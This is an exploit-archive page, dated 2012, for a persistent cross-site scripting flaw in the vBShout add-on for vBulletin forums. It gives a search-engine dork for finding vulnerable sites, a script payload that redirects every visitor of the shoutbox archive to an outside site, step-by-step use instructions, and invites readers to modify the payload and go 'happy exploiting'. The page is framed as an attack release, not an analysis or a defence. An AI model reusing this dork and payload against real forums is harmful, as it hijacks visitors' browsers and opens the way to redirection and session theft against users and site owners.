[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : vBShout Persistent XSS
# Published : 2012-03-22
# Author :
# Previous Title : FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
# Next Title : PRE PRINTING STUDIO Sql Injection
# Exploit Title: vBShout persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 21/3/2012 9:00 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.
######Guide########
Enter
<script>top.location='https://www.bugabuse.net/';</script>
into the shoutbox
go into the archive.
Vioala. Persistent XSS exploit.
Modify to your liking.